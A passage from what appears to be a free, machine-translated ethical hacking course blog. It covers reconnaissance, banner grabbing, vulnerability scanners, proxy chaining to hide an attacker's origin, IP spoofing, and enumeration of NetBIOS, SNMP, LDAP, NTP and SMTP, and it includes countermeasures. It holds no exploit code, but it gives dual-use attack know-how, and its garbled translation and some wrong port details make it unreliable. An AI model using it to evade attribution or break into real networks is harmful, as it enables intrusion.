implemented due to the adverse effect on performance. Because multiple intrusion detection
systems employ signature-based methods to indicate IP-based scanning attempts or TCP headers,
fragmentation can often evade this type of packet detection and filtering. There is a probability of
network problems in the target network.

Banner Grabbing
The fingerprinting or operating system is a method to determine the operating system that runs
on a remote target system. The grabbing banner is important for hacking, since it gives you a
greater chance of success in an attack. This is because most vulnerabilities are specific to the
operating system. Therefore, if you know the OS that runs on the target system, you can hack the
system by exploiting vulnerabilities specific to that operating system.

The banner grabbing can be carried out in two ways, either by detecting the banner when trying
to connect to a service such as FTP or by downloading the binary file / bin / ls to check the
architecture with which it was built.

The banner grabbing is done using the fingerprint technique. A more advanced fingerprint
technique depends on the stack query, which transfers the packets to the host of the network and
evaluates the packets according to the response. The first stack query method was designed
taking into account the TCP communication mode, in which the response of the connection
requests is evaluated. The following method is known as the ISN (Initial Sequence Number)
analysis. This identifies the differences in the random number generators found in the TCP stack.
A new method, which uses the ICMP protocol, is known as ICMP response analysis. It consists
of sending the ICMP messages to the remote host and evaluating the response. The latest ICMP
messaging is known as temporal response analysis. Like others, this method uses the TCP
protocol. The temporal response analysis is seen.
Active Banner Grabbing

 Specially designed packages are sent to the remote OS and the responses are noted
 The answers are compared with the differences in the TCP / IP stack implementation

Banner grabbing passive

 Banner that captures error messages: error messages provide information such as the
type of server, the type of operating system and the SSL tool used by the destination
remote system
 Detect network traffic: Capture and annulate target packages allows an attacker to
determine the operating system used by the remote system
 Banner Ad from page extensions: Find an extension in the URL can help determine the
application version

Why is the grabbing banner important?

The identification of the operating system used in the destination host allows an attacker to
discover the vulnerabilities that the system has and the exploits that could work in a system to
carry out additional attacks.

Interesting tools:

Serve ID, Netcraft, Netcat, are good tools we will see more of this in the practice of this
computer security course.

Countermeasures to Banner Grabbing

 Show fake banners to deceive attackers


 Disable unnecessary services on the network host to limit the disclosure of information
 Use the ServerMask tools to disable or change the banner information
 Modify the configuration of the servers so that they do not show the banners on the
operating system

Vulnerability scan
Vulnerability analysis identifies the vulnerabilities and weaknesses of a system and a network to
determine how a system can be exploited, similar to other security tests such as scanning in open
ports and tracking, vulnerability testing also helps protect your network by determining gaps or
vulnerabilities in its current security mechanism. This same concept can also be used by
attackers to find the weak points of the target network. Ethical hackers can use this concept to
determine the security weaknesses of their target business and fix it before malicious hackers
find and exploit them.

Vulnerability analysis can find vulnerabilities in:

1. Network topology and operating system vulnerabilities


2. Open ports and services in execution
3. Vulnerabilities of applications and services

Nessus

It is a vulnerability scanner, a program that looks for errors in the software. This tool allows a
person to discover a specific way to violate the security of a software product. The vulnerability
in several levels of detail, then gives you a full report with all the details.

The characteristics of Nessus are:

 Audit without agent


 Compliance checks
 Content audits
 Custom reports
 Discovery of high-speed vulnerability
 In-depth evaluations
 Audits of mobile devices
 Integration of patch management
 Design and execution of scanning policies

To obtain more accurate and detailed information about Windows-based hosts in a Windows
domain, the user can create a domain group and an account that have remote registry access
privileges. After completing this task, you have access not only to the configuration of the
registry keys, but also to the service pack patches levels, Internet Explorer vulnerabilities and the
services that run on the host.

GFI LanGuard

GFI LanGuard acts as a virtual security consultant, offers patch management, vulnerability
assessment and network audit services. He also assists in asset inventory, change management,
risk analysis and compliance tests.
Characteristics of GFI LanGuard:

 Selectively create vulnerability checks


 Identify security vulnerabilities and take corrective actions
 Create different types of scans and vulnerability tests
 Help ensure that third-party security applications offer optimal protection
 Perform network device vulnerability checks

Qualys FreeScan

Characteristics:

 Scan computers and applications on the Internet or your network


 Test websites and applications for the main risks and malware of OWASP

More tools:

 OpenVAS
 Nexpose
 SAINT
 Core Impact Professional

If you are going to use one of these tools in a professional way, it is recommended that you
buy a software license, in this way it will be a more professional audit towards your client.

Drawings of network diagrams

Network mapping in diagrams helps you identify the topology or architecture of the target
network, the network diagram also helps you track the route to the target host on the network. It
also allows you to understand the position of firewalls, routers and other access control devices.
Based on the network diagram, the attacker can analyze the topology and security mechanisms of
the target network. It helps an attacker to have this information, can try to discover the target
network. Once the attacker has this information, he can try to discover the vulnerabilities or
weaknesses of those security mechanisms. Then, the attacker can find his way into the target
network by exploiting those security weaknesses.

The network diagram also helps network administrators manage their networks. Attackers use
network discovery or mapping tools to draw network diagrams of target networks.
Network Topology Mapper

Features:

 Discovery and mapping of network topology


 Export network diagrams to Visio
 Mapping network for regulatory compliance
 Discovery of multi-level networks
 Automatic detection of changes in the network topology

More tools

 NetMapper
 NetworkView
 The Dude

Proxy Server
A proxy is a server that can serve as an intermediary to connect with other computers, you can
use a proxy server in many ways, such as:

 Like a firewall, a proxy protects the local network from external access
 As an IP address multiplexer, a proxy allows multiple computers to connect to the
Internet when it only has one IP address
 To anonymize web browsing (to some extent)
 To filter unwanted content, such as ads or "inappropriate" material (using specialized
proxy servers)
 To provide some protection against hacker attacks
 To save bandwidth

Let's see how a proxy server works

When you use a proxy to request a particular web page on a real server, you first send your
request to the proxy server. Then, the proxy server sends your request to the real server on behalf
of your request, mediating between you and the actual server to send and respond to the request
as shown below:
In this process, the proxy receives the communication between the client and the target
application. To take advantage of a proxy server, client programs must be configured so that they
can send their requests to the proxy server instead of the final destination.

Why do hackers use Proxies?

For a hacker, it is easy to attack a particular system to hide the source of the attack, so the main
challenge for an attacker is to hide his identity so that no one can track him. To hide the identity,
the attacker uses the proxy server. The main cause behind the use of a proxy is to avoid detection
of evidence of attack. With the help of the proxy server, an attacker can mask your IP address so
you can hack into the computer system without fear of legal repercussions. When the attacker
uses a proxy to connect to the destination, the source address of the proxy will be recorded in the
server logs instead of the attacker's actual source address.

In addition to this, the reasons why attackers use proxy servers include:

 The attacker appears in the log files of a victim server with a false source address of the
proxy instead of the actual address of the attacker.
 To remotely access intranets and other website resources that are normally out of bounds
 To interrupt all requests sent by an attacker and transmit them to a third destination,
therefore, victims can only identify the address of the proxy server.
 To use multiple proxy servers to scan and attack, making it difficult for administrators to
trace the true source of attack

Examples of use of proxies in computer attacks

A lot of proxies are intentionally open for easy access, anonymous proxies hide the real IP
address (and sometimes other information) of the websites that the user visits. There are two
types of anonymous proxies and others that are anonymizers based on the web.

Let's see how many different ways to attack can use proxies to commit attacks on the target.

 Case 1: the attacker makes attacks directly without using proxy. The attacker may be at
risk of being tracked while the server logs that it contains information about the IP
address of the source.
 Case 2: the attacker uses the proxy to search the destination application. In this case, the
server log will show the IP address of the proxy instead of the IP address of the attacker,
hiding its identity, so the attacker will run the minimum risk of being caught. This will
give the attacker the desire to be anonymous on the Internet.
 Case 3: to be more anonymous on the Internet, the attacker can use the proxy chaining
technique to find the target application. If he or she uses proxy chaining, then it is very
difficult to trace their IP address. Proxy chaining is a technique of using more proxies to
capture the target.
Proxy chaining or chain chaining

Proxy chaining helps you to be more anonymous on the Internet, your anonymity on the Internet
depends on the number of proxies used to obtain the target applications. If you use a larger
number of proxy servers, it will become more anonymous on the Internet and vice versa.

When the attacker first requests the proxy1 server, this proxy1 server in turn requests another
proxy2 server. The proxy server1 removes the user's identification information and passes the
request to the next proxy server. This may re-request another proxy server, proxy3, etc. Up to the
destination server, where the request is finally sent. Therefore, it forms the chain of the proxy
server to reach the destination server, this affects the performance as is logical.

Tool: Tor

Tor allows you to protect your privacy and defend against network surveillance and traffic
analysis

Anonymizers

An anonymizer removes all identification information from the user's computer while the user
browses the Internet, anonymizers make the activity on the Internet is not traceable, anonymizers
allow you to avoid Internet censors.

Why use an anonymizer?

 Privacy and anonymity


 Protect from online attacks
 Access restricted content
 Ignore the IDS and Firewall rules

Tool: Tails
Tails is a live operating system, which the user can start on any computer from a DVD, USB
device or SD card

Your goal is to preserve privacy and anonymity and help you:

 Use the Internet anonymously and avoid censorship


 Do not leave traces on the computer
 Use state-of-the-art cryptographic tools to encrypt files, emails and instant messages

HTTP tunneling techniques

HTTP Tunneling is another technique that allows you to use the Internet despite restrictions
imposed by the firewall. The HTTP protocol acts as a wrapper for communication channels.

An attacker uses HTTP tunneling software to perform HTTP tunneling, it is an application based
on a client server used to communicate through the HTTP protocol. This software creates an
HTTP tunnel between two machines, using a web proxy option. The technique involves sending
POST requests to an "HTTP server" and receiving replies.

The attacker uses the client application of the HTTP tunnel software installed on his system to
communicate with other machines. All requests sent through the HTTP tunnel client application
go through the HTTP protocol.

The HTTP tunneling technique is used in network activities such as:

1. Video and audio transmission


2. Remote procedure requires network management
3. For intrusion detection alerts
4. Firewalls

Countermeasures to the tunnels in HTTP

 Encrypt all network traffic using cryptographic network protocols such as IPsec, TLS,
SSH and HTTPS.
 Use multiple firewalls that provide a multilayer protection depth
 Do not trust IP-based authentication
 Use a random initial sequence number to avoid IP spoofing attacks based on the spoofing
of the sequence number
 Input filtering: Use routers and firewalls on the perimeter of your network to filter
incoming packets that appear to come from an internal IP address
 Output filtering: filter all outgoing packets with an invalid local IP address as the source
address.
Tools

 Super Network Tunnel


 HTTP-Tunnel

IP spoofing
IP spoofing refers to changing the source IP addresses so that the attack appears to come from
another person, when the victim responds to the address that returns the false address and not the
actual address of the attacker.

Detect IP spoofing with direct TTL probes

 Send packet to the host of the counterfeit suspicious package that triggers the response
and compare the TTL with the suspicious package, if the TTL in the response is not the
same as the package being verified, it is a counterfeit package. This technique is
successful when the Attacker is in a different subnet of the victim.

Detect IP spoofing with the IP identification number

 Send the probe to the host of the counterfeit suspicious traffic that triggers the response
and compares the IP identification with the suspicious traffic
 If the IP IDs are not in the value close to the packet being checked, the suspicious traffic
was simulated
 This technique is successful even if the attacker is on the same subnet

Detect IP spoofing with the TCP flow control method

 Attackers sending counterfeit TCP packets will not receive the target's SYN-ACK
packets
 Therefore, attackers can not respond to the change in the size of the congestion window
 When the received traffic continues after the window size is exhausted, it is most likely
that the package has been falsified

Countermeasures to IP spoofing

 Encrypt all network traffic.


 Use multiple firewalls that provide a multilayer protection depth
 Do not trust IP-based authentication
 Use a random initial sequence number to avoid IP spoofing attacks based on the spoofing
of the sequence number
 Input filtering: Use routers and firewalls on the perimeter of your network to filter
incoming packets that appear to come from an internal IP address
 Output Filtering: filter all outgoing packets with an invalid local IP address as the
source address.

Scanning in the Pentesting


The network penetration test helps you determine the security posture of the network by
identifying live systems, discovering open ports and associated services, and trapping banners
from a remote location, simulating an attempt to hack the network . You should scan or test the
network in all possible ways to ensure that no security holes are overlooked.

Once you have finished with the penetration test, you must document all the findings
obtained in each test stage to help system administrators to:

 Close unused ports if it is not necessary, unknown open ports are discovered
 Disable unnecessary services
 Hide or customize banners
 Troubleshoot service configuration errors
 Calibrate firewall rules to impose more restrictions

1. Host Discovery
The first step of network penetration testing is to detect live hosts in the target network.
You can try to detect the host live, the hosts accessible in the destination network, using
network scanning tools such as nmap, it is difficult to detect live hosts behind the firewall
2. Port Scan
Perform port scanning using tools such as nmap, these tools will help you poll a server or
host on the target network for open ports. The open ports are the accesses for the
attackers to install malware in a system, therefore, you must verify if there are open ports
and close them if it is not necessary.
3. Appropriation of banners or recognition of the operating system
The use of tools such as nmap determines the operating system that runs on the
destination host of a network and its version. Once you have known the version and
operating system that runs on the target system, look for and exploit the vulnerabilities
related to that operating system, try to gain control over the system and endanger the
entire network.
4. Vulnerability analysis
Examine the network for vulnerabilities using network vulnerability scanning tools such
as Nessus, these tools help you find the vulnerabilities present in the target system or
network.
5. Draw network diagrams
Draw a network diagram of the target organization that helps you understand the logical
connection and the route to the destination host on the network. The network diagram can
be drawn with the help of tools such as OpManager, the network diagrams provide
valuable information about the network and its architecture.
6. Proxies
Prepare proxies using tools like Proxifier, to hide from being captured.
7. Document all findings
The last step, but the most important in scanning penetration tests, is to preserve all the
results of the test performed in the previous steps in a document. This document will help
you find potential vulnerabilities in your network. Once you determine the potential
vulnerabilities, you can plan the contraintions accordingly. Therefore, penetration tests
help you evaluate your network before it becomes a real problem.

This module ends here, I hope you have learned the objectives of this module. This course has an
effort and it is free, I would like you to share it in your social networks or hacking forums so that
more people see it, this course will advance until you reach 20 modules at least and will be more
advanced, you can subscribe if you want to know the advanced the course, every 7 days sent an
email informing everything that happens in the blog, see you soon!

Practice: Ethical Hacking Course - Practice 3 - Network Scanning

en.gburu.net

 Home
 Courses
 FREE $10 in DigitalOcean
 about
 contact
 gburu.net

Subscribe
12 February 2018

Ethical Hacking Course - Module 4 -


Enumeration of Objective Systems
Ethical Hacking Course, Computer Security

If you already saw the previous module of this ethical hacking course that teaches us how is the
scanning of networks, this module will deal with the recognition of the objective system, it is
basically the enumeration of the information of each service that works in the system,
specifically looking for information about the network, groups of system users, device names, all
this performs actively, that is, the target can easily detect this activity.

Full course: en.gburu.net/hack, here you will find all the topics of this free ethical hacking
course, in one place.
Responsibility:
This ethical hacking course is aimed at educational purposes to improve your computer security
skills to plan and design safer networks, does not encourage illegal activities in systems or
networks of third parties, if you commit an illicit activity in a system or network. You will do at
your own risk. If you want to practice and improve your skills in ethical hacking, do it under
systems where you have a legal permit or are yours, I recommend using images of operating
systems installed in virtual machines in a controlled environment.

Agenda: Module 4 - Enumeration of Objective Systems

 Objectives of module 4
 Introduction to System Enumeration
 Common techniques for system enumeration
 Services and ports, ideal for enumeration
o TCP 53: Zone Transfer with DNS
o TCP 135: Microsoft RCP
o TCP 137: NetBIOS Name Service (NBNS)
o TCP 139: NetBIOS Session Service (SMB over NetBIOS)
o TCP 445: SMB over TCP
o UDP 161: Simple Network Management Protocol (SNMP)
o TCP/UDP 389: Lightweight Directory Access Protocol (LDAP)
o TCP/UDP 3368: Global Catalog Service
o TCP 25: Simple Mail Transfer Protocol (SMTP)
 NetBIOS Enumeration
o Useful tools for NetBIOS enumeration
o Useful tools for the enumeration of Users
 System Enumeration, using default passwords
 Simple Network Management Protocol (SNMP) Enumeration
o Management Information Base (MIB)
o Tools for SNMP enumeration
 UNIX and Linux Enumeration
o Finger Enumeration
o Enumeration with rpcinfo
o Enumeration with rpcclient
o Enumeration with showmount
o Enum with enum4linux
 LDAP Enumeration
o LDAP Administrator
 NTP Enumeration
 SMTP Enumeration
o Tools for SMTP enumeration
 DNS Enumeration
 Countermeasures for System Enumeration
o Countermeasures for SNMP enumeration
o Countermeasures for DNS Enumeration
o Countermeasures for SMTP Enumeration
o Countermeasures for LDAP enumeration
o Countermeasures for SMB enumeration
 The importance of Enumeration in Pentesting

Objectives of Module 4
In the previous modules, you could see and learn about the recognition and scanning of the
objective. The next phase of the pentesting is the enumeration. As a pentester, you should know
what the purpose of the enumeration of a system is, the techniques used to perform the
enumeration, where the enumeration should apply, what information it obtains, the enumeration
tools and the countermeasures that can strengthen the security of the network and of the
objective itself. All these things are covered in this module.

Let's talk about the following:

 Introduction to the Enumeration of Systems


 Techniques to apply an enumeration
 Services and ports, ideal for enumeration
 Enumeration of UNIX / Linux
 Countermeasures to avoid being victims of an enumeration
 The importance of the enumeration in the Pentesting

Introduction to System Enumeration


The enumeration of systems is defined as the process of extraction of user names, machine
names, network resources, shared resources and services of a system. In the enumeration phase,
the attacker creates active connections to the system and performs targeted queries to obtain
more information about the target. The attacker uses the information collected to identify
vulnerabilities or weaknesses in the security of the system and then tries to exploit them. The
enumeration techniques are carried out in an intranet environment. Involves making active
connections to the target system. It is possible for the attacker to trip over a remote IPC share,
such as IPC $ in Windows, which can be tested with a null session that allows you to list actions
and accounts.

The previous modules of this computer security course highlighted how the attacker gathers the
necessary information about the objective. The type of information listed by the attackers can be
grouped freely into the following categories:

 Network resources and resources


 Users and groups
 Routing tables
 Audit and services configuration
 Names of machines
 Applications and banners
 Details of SNMP and DNS
Techniques for Enumeration
In the enumeration process, an attacker collects data such as network users and group names,
routing tables, and Simple Network Management Protocol (SNMP) information. This module of
the computer security course explores the possible ways in which an attacker can enumerate a
target network, and what countermeasures can be taken.

The following are the different enumeration techniques that attackers can use:

 Extract user names by email ID: In general, each email ID contains two parts, one is a
username and the other is a domain name. The structure of an email address is:
"[email protected]". Consider [email protected], in this email ID "gpostsocial"
(characters that precede the symbol) is the username and "gmail.com" (the characters that
proceed with the symbol) is the domain name.
 Extract information by using default passwords: Many online resources provide lists
of default passwords assigned by the manufacturer for their products. Often users forget
to change the default passwords provided by the manufacturer or developer of the
product. If users do not change their passwords for a long time, attackers can easily list
their data.
 Gross Force vs. Active Directory: Microsoft Active Directory is susceptible to a
weakness of user name enumeration at the time of input verification provided by the user.
This is the consequence of the design error in the application. If the "session initiation
hours" function is enabled, attempts to authenticate the service result in variation of the
error messages. Attackers take advantage of this advantage and exploit the weakness to
list valid usernames. If an attacker manages to reveal valid usernames, he or she can
perform a brute force attack to reveal the respective password.
 Extracting SNMP users' names: attackers can easily guess the "strings" using this
SNMP API through which they can extract the required user names.
 Extract Windows user groups: to extract user accounts from specific groups and store
the results and also verify if the session accounts are in the group or not.
 Extract information by DNS zone transfer: DNS zone transfer reveals a large amount
of valuable information about the particular zone that you are requesting. When a DNS
zone transfer request is sent to the DNS server, the server transfers its DNS records that
contain information, such as the DNS zone transfer. An attacker can obtain valuable
topological information about a target's internal network by transferring DNS zone.

Services and ports, ideal for enumeration


 TCP 53: Zone Transfer with DNS
DNS zone transfer depends on TCP port 53 instead of UDP 53. If TCP 53 is in use, it
means that the DNS zone transfer is in process. The TCP protocol helps maintain a DNS
database between DNS servers. This communication occurs only between DNS servers.
DNS servers always use the TCP protocol for zone transfer. The established connection
between the DNS servers transfers the data of the zone and also helps the originating and
destination DNS servers to guarantee the coherence of the data by means of the TCP
ACK bit.

 TCP 135: Microsoft RCP


The RPC port 135 is used in client/server applications to exploit message services. To
stop the pop-up window, you will need to filter port 135 at the firewall level. When you
try to connect to a service, go through this dispatcher to discover where it is located.

 TCP 137: NetBIOS Name Service (NBNS)


NBNS, also known as Windows Internet Name Service (WINS), provides a name
resolution service for computers running NetBIOS. The NetBIOS name servers maintain
a database of NetBIOS names for hosts and the corresponding IP address that the host is
using. The job of NBNS is to match IP addresses with NetBIOS names and queries. The
name service is usually the first service that will be attacked.

 TCP 139: NetBIOS Session Service (SMB over NetBIOS)


The NetBIOS session service is used to configure and delete sessions between computers
with NetBIOS capability. The sessions are established by exchanging packages. The
computer that establishes the session tries to make a TCP connection to port 139 on the
computer with which the session will be established. If the connection is established, the
computer that establishes the session sends through the connection a "Session Request"
package with the NetBIOS names of the application that establishes the session and the
NetBIOS name to which the session will be established. . The computer with which the
session will be established will respond with a "Positive session response" indicating that
a session can be established or a "Negative session response" indicating that no session
can be established.

 TCP 445: SMB over TCP


By using TCP port 445, you can directly access the TCP/IP MS network without the help
of a NetBIOS layer. You can only get this service in recent versions of Windows, such as
Windows 2K/XP. Exchange of files in Windows 2K / XP can only be done through the
use of the Server Message Block (SMB) protocol. You can also run SMB directly over
TCP/IP in Windows 2K/XP without using the additional layer of NetBT. They use TCP
port 445 for this purpose.

 UDP 161: Simple Network Management Protocol (SNMP)


You can use the SNMP protocol for various devices and applications (including firewalls
and routers) to communicate registration and management information with remote
monitoring applications. SNMP agents listen on UDP port 161, asynchronous traps are
received on port 162.

 TCP/UDP 389: Lightweight Directory Access Protocol (LDAP)


You can use the Internet Protocol LDAP (Lightweight Directory Access Protocol), use
MS Active Directory, as well as some email programs to look up contact information for
a server. Both Microsoft Exchange and NetMeeting install an LDAP server on this port.
 TCP/UDP 3368: Global Catalog Service
You can use TCP port 3368, which uses one of the main protocols in TCP/IP, a
connection-oriented protocol network, requires a three-way exchange to establish end-to-
end communications. Only then is a connection established with the user's data and it can
be sent bi-directionally through the connection. TCP guarantees the delivery of data
packets on port 3368 in the same order in which they were sent. You can use UDP port
3368 for unsecured communication. It provides an unreliable service and the datagrams
can arrive duplicated, out of service or missing without notice and error. Verification and
correction is neither necessary nor done in the application, avoiding the overload of such
processing at the network interface level. UDP (User Datagram Protocol) is a minimum
message-oriented transport layer protocol. Examples that often use UDP include voice
over IP (VoIP), streaming media and multiplayer games in real time.

 TCP 25: Protocol for Simple Mail Transfer (SMTP)


SMTP allows you to move email through the Internet and through your local network. It
runs on the connection-oriented service provided by the Transmission Control Protocol
(TCP) and uses the well-known port number 25. Telnet to port 25 on a remote host. This
technique is sometimes used to test the SMTP server of a remote system, but here you
can use this command line technique to illustrate how mail is delivered between systems.

NetBIOS enumeration

The first step in enumerating a Windows machine is to take advantage of the NetBIOS API.
NetBIOS stands for Basic Network Input Output System. IBM, in partnership with Sytek,
developed NetBIOS. It was developed as an Application Programming Interface (API),
originally to facilitate access of LAN resources to client software. The NetBIOS name is a
unique ASCII character string 16 used to identify network devices via TCP/IP, 15 characters are
used for the device name and the 16th character is reserved for the type of service record or name
.

Attackers use the NetBIOS enumeration to obtain:

 List of computers belonging to a domain and actions of individual hosts in the network
 Policies and passwords

If an attacker finds a Windows operating system with port 139 open, he would be interested to
verify what resources he can access or see on the remote system. However, to list the NetBIOS
names, the remote system must have enabled the sharing of files and printers. Using these
techniques, the attacker can launch two types of attacks on a remote computer that has NetBIOS.
The attacker can choose to read / write to a remote computer system, depending on the
availability of shared resources, or initiate a denial of service.
Useful tools for NetBIOS enumeration:

1. Nbtstat shows the NetBIOS protocol statistics over TCP / IP (NetBT), the NetBIOS
name tables for the local computer and remote computers, and the NetBIOS name cache.
Nbtstat allows you to update the NetBIOS name cache and the names registered with the
Windows Internet Name Service (WINS). Used without parameters, Nbtstat shows help.
2. SuperScan is a TCP port scanner, pinger and resolution of hostnames based on the
connection . Perform ping sweeps and scan any IP range with multi-threaded and
asynchronous techniques.
3. NetBIOS Enumerator is recommended when you want to determine how to use remote
network compatibility and how to deal with other interesting web techniques, such as
SMB.

Useful tools for the enumeration of Users:

1. PsExec is a command line tool used for telnet replacement that allows you to run
processes on other systems and console applications, without having to manually install
the client software. When using a specific user account, PsExec transfers the credentials
clearly to the remote workstation, thus exposing the credentials to anyone who is
listening.
2. PsFile is a command-line utility that displays a list of files on a system that opens
remotely, and also allows you to close open files, either by name or by a file identifier.
The default behavior of PsFile is to list the files on the local system that are open by
remote systems. Writing a command followed by "-" shows information about the
command syntax
3. PsGetsid allows you to translate SID to your display name and vice versa. It works in
integrated accounts, domain accounts and local accounts. It also allows you to see the
SIDs of the user accounts and translates a SID into the name that represents it and works
across the network so you can query the SID remotely.
4. PsKill is a removal tool that can kill processes on remote systems and terminate
processes on the local computer. You do not need to install any client software on the
target computer to use PsKill to complete a remote process.
5. Pslnfo is a command-line tool that gathers key information about the local or remote
Windows NT / 2000 system, including the type of installation, kernel compilation, owner
and registered organization, number of processors and their type, amount of physical
memory, installation date of the system and, if it is a trial version, the expiration date.
6. PsList is a command line tool that administrators use to view information about the
process CPU and memory information or thread statistics. The tools in the resource kits,
pstat and pmon, show you different types of data, but only show the information related
to the processes in the system in which you run the tools.
7. PsLoggedOn is an applet that shows local and remote registered users. If you specify a
user name instead of a computer, the PsLoggedOn tool searches all the computers in the
neighborhood of the network and tells you if the user is currently connected. The
PSLoggedOn definition of a locally connected user is one that has its profile loaded in the
Registry, so PsLoggedOn determines who initiates the session by scanning the keys
under the HKEY_USERS key.
8. PsLogList display the contents of the system event log on the local computer, with a
visually friendly format of the event log records. The command line options allow you to
view the records on different computers, use a different account to view a record, or have
the output formatted in a friendly way to search for strings.
9. sPasswd is a tool that allows the administrator to create batch files that run PsPasswd on
the computer network to change the administrator password as part of the standard
security practice.
10. PsShutdown is a command line tool that allows you to remotely shut down the PC in
networks. You can log out of the console user or lock the console (blocking requires
Windows 2000 or higher). It does not require any manual installation of the client's
software.

Enumeration of Systems, using default passwords


Devices such as switches, hubs, routers and access points generally come with "default
passwords". Not only network devices but also some local and online applications have built-in
default passwords. These passwords are provided by application vendors or programmers during
product development. Most users use these applications or devices without changing the default
passwords provided by the provider or programmer. If you do not change these default
passwords, you may be at risk because the default password lists for many products and
applications are available online. Once such an example is cirt.net/passwords, it provides verified
login / password pairs for common network devices. The logins and passwords contained in this
database are configured by default when the hardware or software is installed for the first time
or, in some cases, are rigidly encoded in the hardware or software.

Attackers take advantage of these default passwords and online resources that provide default
passwords for various products and applications. Attackers gain unauthorized access to the
organization's computer network and information resources through the use of common and
default passwords.

Enumeration of Simple Network Management Protocol


(SNMP)
SNMP (Simple Network Management Protocol) is an application layer protocol that runs in UDP
and is used to maintain and manage routers, hubs, and switches in an IP network. SNMP agents
run on Windows and UNIX networks on network devices.

SNMP Enumeration is the process of enumerating user accounts and devices on a destination
computer using SNMP. SNMP uses two types of software components to communicate. They
are the SNMP agent and the SNMP management station. The SNMP agent is in the network
device while the SNMP management station communicates with the agent.

Almost all network infrastructure devices such as routers, switches, etc. they contain an SNMP
agent to manage the system or devices. The SNMP management station sends the requests to the
agent, after receiving the request, the agent sends back the responses. Both the requests and the
responses are the configuration variables that the agent software can access. SNMP management
stations also send requests to set values on some variables. Trap informs the management station
if something happened on the agent's part, such as a restart or interface failure or any other
abnormal event. SNMP contains two passwords that you can use to configure and access the
SNMP agent from the management station.

The two SNMP passwords are:

1. Read community string:


o The configuration of the device or system can be seen with the help of this
password
o These chains are public
2. Read/write community string:
o The settings on the device can be changed or edited using this password
o These chains are private

When the community strings are left in the default configuration, the attackers take advantage of
the opportunity and find gaps in them. Then, the attacker can use these default passwords to
change or view the configuration of the device or system. Attackers list SNMP to extract
information about network resources, such as hosts, routers, devices, shares, network
information, such as ARP tables, routing tables, device-specific information, and traffic statistics.

Management Information Base (MIB)

MIB is a virtual database that contains a formal description of all network objects that can be
managed using SNMP. MIB is the collection of information organized hierarchically. Provides a
standard representation of the information and storage of the SNMP agent. MIB elements are
recognized using object identifiers. Object ID is the numeric name given to the object and starts
with the root of the MIB tree. The object identifier can uniquely identify the object present in the
MIB hierarchy.

Objects managed by MIB include scalar objects that define a single instance of object and
tabular objects that define groups of instances of related objects. Object identifiers include the
type of object, such as counter, string or address, access level, such as read or read/write, size
restrictions and range information. MIB is used as a codebook by the SNMP manager to convert
the OID numbers into a human readable screen.
The content of the MIB can be accessed and viewed using a web browser, either by entering the
IP address and Lseries.mib or by entering the name of the DNS library and Lseries.mib. For
example, http://IP/Lseries.mib or http://library_name/Lseries.mib.

Microsoft provides the list of MIBs that are installed with the SNMP Service in the Windows
resource kit. The main ones are:

DHCP.MIB: monitors network traffic between DHCP servers and remote hosts
HOSTMIB.MIB: monitors and manages host resources
LNMIB2.MIB: Contains object types for workstation and server services
WINS.MIB: for the Windows Internet name service

Tools for SNMP enumeration

 OpUtils is a collection of tools with which network engineers can monitor, diagnose and
troubleshoot their IT resources. You can control the availability and other activities of
critical devices, detect unauthorized access to the network and manage IP addresses. It
allows you to create custom SNMP tools through which you can monitor the MIB nodes.
 Nsauditor network security audit, scanning and detection of vulnerabilities that monitor
access from the network to shared files and folders, detection and control of network
violations. network data access policies

Enumeration of UNIX and Linux

The commands used to enumerate the UNIX network resources are the following: showmount,
finger, rpcinfo (RPC) and rpcclient.

Finger Enumeration

Finger is used to list users on the remote machine. It allows you to view the user's home
directory, the login time, the hours of inactivity, the location of the office and the last time they
received or read an email.

finger <option> <user>

Enumeration with rpcinfo (RPC)


It helps you enumerate the remote procedure call protocol. This in turn allows applications to
communicate through the network.

rpcinfo <option> <hots>

Enumeration with rpcclient

rpcclient is used to enumerate Linux and Unix user

Enumeration with showmount

showmount identifies and lists the shared directories available on a system. Clients that are
mounted remotely on a file system from a host are listed by showmount. mountd is an RPC
server that responds to NFS access information and file system mount requests. The mountd
server on the host maintains the information obtained. The /etc/rmtab file saves the blocking
information. The default value for the host is the value returned by the host name

Enumeration with Enum4linux

It is a tool that allows you to list samba information, as well as Windows systems.

characteristics:

 RID Cycling (When RestrictAnonymous is set to 1 in Windows 2000)


 List of users (when RestrictAnonymous is set to 0 in Windows 2000)
 List of group membership information
 Enumeration of actions
 Detecting if the host is in a work group or a domain
 Identification of the remote operating system
 Recovery of password policy (using pollenum)

LDAP Enumeration

The Lightweight Directory Access Protocol (LDAP) is used to access directory listings within an
Active Directory or other directory services. A directory is compiled in hierarchical or logical
form, a bit like the levels of management and employees in a company. It is suitable to connect
with the Domain Name System (DNS) to allow quick searches and fast resolution of queries. It
usually runs on port 389 and other similar protocols. You can consult the LDAP service
anonymously. The query will divulge sensitive information, such as user names, addresses,
department details, server names, etc. That the attacker can use to launch the attack.
LDAP Administrator

Softerra LDAP Administrator is an LDAP administration tool that allows you to work with
LDAP servers such as Active Directory, Novell Directory Services, Netscape / iPlanet, etc.
Generate customizable directory reports with the necessary information for effective monitoring
and auditing.

characteristics:

 Provides directory search services, mass update operations, group membership,


management facilities, etc.
 It supports LDAP-SQL, which allows you to manage LDAP entries using syntax similar
to SQL.

Enumeration of NTP
Before we start with NTP enumeration, let's first analyze what the NTP is. NTP is a network
protocol designed to synchronize clocks of networked computer systems. NTP is important when
directory services are used. It uses UDP port 123 as its main means of communication. NTP can
keep time within 10 milliseconds (1/100 seconds) through the public Internet. You can achieve
accuracies of 200 microseconds or more in local area networks under ideal conditions.

Through the enumeration of NTP, you can collect information such as lists of hosts connected to
the NTP server, IP addresses, system names and operating systems that run on client systems in a
network. All this information can be listed when consulting the NTP server. If the NTP server is
in the DMZ, it is also possible to obtain internal IP addresses.

The NTP enumeration can be done using the command line tool of the NTP suite. NTP Suite is
used to query the NTP server to obtain the desired NTP information. This command-line tool
includes the following commands:

 ntptrace: this command helps you determine from where the NTP server updates its time
and tracks the chain of NTP servers from a given host to the main source.
 ntpdc: this command will help you consult the ntpd daemon about its current status and
request changes in that state.
 ntpq: this command will help you monitor the operations of NTP daemon ntpd and
determine performance.

SMTP Enumeration
Enumeración SMTP allows you to determine valid users in the SMTP server. This is achieved
with the help of three integrated SMTP commands. The three commands are:

 VRFY: this command is used to validate users


 EXPN: This command tells the actual delivery address of aliases and mailing lists
 RCPT TO: defines the message recipients

SMTP servers respond differently to the VRFY, EXPN, and RCPT TO commands for valid and
invalid users. Therefore, by observing the response of the SMTP server to these commands, one
